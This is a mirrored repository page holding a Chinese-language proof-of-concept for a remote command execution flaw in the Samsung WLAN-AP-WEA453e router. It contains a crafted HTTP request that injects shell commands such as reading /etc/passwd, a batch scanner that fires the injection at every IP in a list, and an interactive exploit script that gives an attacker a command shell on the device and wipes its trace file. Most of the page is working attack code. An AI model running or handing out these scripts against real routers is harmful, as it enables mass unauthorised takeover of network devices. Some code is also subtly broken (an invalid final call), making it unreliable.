admin/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-11-07 03:34:40 +00:00
Code Issues Packages Projects Releases Wiki Activity
Penetration_Testing_POC/WLAN-AP-WEA453e RCE三星路由器远程命令执行漏洞.md

154 lines
4.7 KiB
Markdown
Raw Normal View History

Create WLAN-AP-WEA453e RCE三星路由器远程命令执行漏洞.md
2022-08-21 14:28:55 +08:00
### 漏洞简介
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|WLAN-AP-WEA453e RCE三星路由器远程命令执行漏洞|2020-8|未知|https://www.Samsung.com| |三星WLAN-AP-WEA453e路由器|
路由器首页
![image](https://user-images.githubusercontent.com/86941613/185778437-2e5218e7-68a0-4d60-8f53-2e91c0d576f4.png)
### 漏洞原理
利用burp构造特殊的请求
```shell
POST /(download)/tmp/a.txt HTTP/1.1
Host: xxx.xxx.xxx.xxx
command1=shell:cat /etc/passwd| dd of=/tmp/a.txt
```
![image](https://user-images.githubusercontent.com/86941613/185778450-ef88e085-aa79-407d-a0ae-bedb50fb53dd.png)
### POC批量检测代码如下
```python
#filename: Check.py
#Usage: python3 Check.py ip.txt
import requests
import sys
import datetime
def CheckVuln(host):
vurl = host+'/(download)/tmp/a.txt'
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','Connection': 'close'}
data = {'command1':'shell:ls|dd of=/tmp/a.txt'}
try:
req = requests.post(url=vurl,data=data,verify=False,headers=headers,timeout=1)
if req.status_code ==200 and 'root' in req.text:
T = ('[*]-'+host+'-----Vulnerable!')
print(T)
OutPut(T)
else:
T = ('[-]-'+host+'-----Not Vulnnerable')
print(T)
OutPut(T)
except:
T = host+'[-]-----Network Error'
print(T)
OutPut(T)
def OutPut(F):
time = datetime.datetime.now().strftime('%Y-%m-%d')
#print(time)
f = open(time+'.txt','a')
f.write(F + '\n')
f.close()
def GetUrl(path):
with open(path,'r',encoding='utf-8') as f:
for i in f:
if i.strip() != '':
oldh = i.strip()
#print(oldh)
host = 'http://'+oldh
CheckVuln(host)
else:
print(path+'Empty File')
if len(sys.argv) != 2:
print('-------------Usage:python3 Check.py ip.txt----------------- ')
sys.exit()
path = sys.argv[1]
GetUrl(path)
```
### EXP
```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import sys
import os
from urllib3.exceptions import InsecureRequestWarning
class exp:
def Checking(self):
try:
Url = self.target + "(download)/tmp/hello.txt"
CkData = "command1=shell:cat /etc/passwd| dd of=/tmp/hello.txt"
response = requests.post(url = Url,data = CkData,verify = False,timeout = 20)
if(response.status_code == 200 and 'root:' in response.text):
return True
else:
return False
except Exception as e:
#print("checking")
print("[-] Server Error!")
def Exploit(self):
Url = self.target + "(download)/tmp/hello.txt"
while True:
try:
command = input("# ")
if(command == 'exit'):
self.Clean()
sys.exit()
if(command == 'cls'):
os.system("cls")
continue
data = "command1=shell:" + command + "| dd of=/tmp/hello.txt"
response = requests.post(url = Url,data = data,verify = False,timeout = 20)
if(response.text == None):
print("[!] Server reply nothing")
else:
print(response.text)
except KeyboardInterrupt:
self.Clean()
exit()
except Exception as e:
print("[-] Server not suport this command")
def Clean(self):
Url = self.target + "(download)/tmp/hello.txt"
try:
CleanData = "command1=shell:busybox rm -f /tmp/hello.txt"
response = requests.post(url = Url,data = CleanData,verify = False,timeout = 10)
if(response.status_code == 200):
print("[+] Clean target successfully!")
sys.exit()
else:
print("[-] Clean Failed!")
except Exception as e:
print("[-] Server error!")
def __init__(self,target,port):
self.target=target
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
if(len(sys.argv) == 3):
module = sys.argv[2]
if(module == 'clean'):
self.Clean()
else:
print("[-] module error!")
while self.Checking() is True:
self.Exploit()
exp(192.168.10.1,80)
```
Reference in New Issue Copy Permalink